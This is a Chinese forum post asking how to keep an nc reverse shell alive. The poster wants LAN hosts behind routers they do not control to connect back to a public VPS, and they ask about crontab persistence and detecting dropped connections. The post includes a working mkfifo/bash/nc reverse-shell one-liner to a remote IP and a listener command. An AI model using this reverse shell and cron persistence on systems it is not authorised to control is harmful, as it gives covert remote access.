请教: nc命令反弹shell
发表于 : 2018-08-26 17:29
服务端:
客户端:
请教:
[1] 在服务端手动Ctrl+C中断nc命令,再次打开服务,服务端与客户端断开,服务端输入无响应,但是客户端的nc命令还在运行,实际上连接已经断开了。
请问,怎么能让客户端判断服务端己主动断开,从而让客户端也断开,以便重连?
[2] 如果把命令加入计划,即使服务端手动断开,客户端通过新建nc可以重建连接,问题是crontab每执行一次就会生成一个新的nc任务,如果频繁新建,估计会新建无数nc连接。只尝试执行了五次,查到5个pid.
请教,怎么能避免crontab执行一次后kill旧命令,生成新命令。
目的:
内网有多层路由且对上级路由无权限控制,因此想通过反弹shell,把局域网内的主机shell反弹给有公网ip的vps上。为了保证不会对局域网内的主机失去控制,想在局域网的主机上多设几层连接保障。
求指点,谢谢
代码: 全选
nc -v -l 3333
代码: 全选
mkfifo /tmp/f
cat /tmp/f | /bin/bash -i | nc 1.1.1.1 3333 > /tmp/f
[1] 在服务端手动Ctrl+C中断nc命令,再次
代码: 全选
nc -v -l 3333
代码: 全选
pwd
请问,怎么能让客户端判断服务端己主动断开,从而让客户端也断开,以便重连?
[2] 如果把命令
代码: 全选
cat /tmp/f | /bin/bash -i | nc 1.1.1.1 3333 > /tmp/f
代码: 全选
crontab -e
代码: 全选
ps -ef | grep nc | grep -v grep
请教,怎么能避免crontab执行一次后kill旧命令,生成新命令。
目的:
内网有多层路由且对上级路由无权限控制,因此想通过反弹shell,把局域网内的主机shell反弹给有公网ip的vps上。为了保证不会对局域网内的主机失去控制,想在局域网的主机上多设几层连接保障。
求指点,谢谢